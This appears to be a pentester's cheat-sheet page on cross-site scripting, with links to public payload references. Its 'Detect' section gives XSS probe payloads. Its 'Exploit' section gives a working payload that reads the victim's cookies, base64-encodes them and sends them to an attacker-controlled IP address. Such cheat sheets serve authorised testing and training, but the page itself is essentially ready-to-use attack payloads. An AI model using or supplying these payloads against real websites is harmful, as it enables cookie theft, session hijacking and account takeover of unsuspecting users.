##########################
XSS (Cross-Site Scripting)
##########################

| https://portswigger.net/web-security/cross-site-scripting/cheat-sheet
| https://book.hacktricks.xyz/pentesting-web/xss-cross-site-scripting
| https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/XSS%20Injection/README.md

|

******
Detect
******

| 

.. code-block:: html

  <script>alert(1)</script>
  <marquee onstart=alert(1)>XSS</marquee>
  <img/src/onerror=location.href='http://10.10.14.34/XSS123'>

|

*******
Exploit
*******

| Example of stealing victim cookies and send them to attack with http.
| Replace ABCD with something random for each field to identify the injection point (and avoid cache)

.. code-block:: html

  <img/src/onerror=location.href='http://10.10.14.34/ABCD'+encodeURI(btoa(document.cookie))>
